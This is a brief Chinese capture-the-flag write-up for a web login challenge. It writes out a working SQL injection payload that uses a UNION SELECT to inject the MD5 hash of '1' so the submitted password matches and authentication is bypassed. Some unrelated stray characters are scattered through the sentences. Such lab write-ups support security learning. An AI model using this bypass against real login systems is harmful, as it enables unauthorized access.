題目地址:http://ctf5.shiyanbar.com/web/5/index.php
查看源代碼可以在半個a標簽里看到源碼
要求select取出的pw與提交的pass相同
這是一道SQL注入的題目养交,我們可以提交user='union select 'c4ca4238a0b923820dcc509a6f75849b&pass=1没卸。
這樣select pw from php where user=''union select 'c4ca4238a0b923820dcc509a6f75849b'的前半句就無法查詢到數(shù)據(jù)郊丛,最會就會select出我們傳遞進去的c4ca4238a0b923820dcc509a6f75849b(1的md5值)腌歉,達成條件卒密。
getflag
the end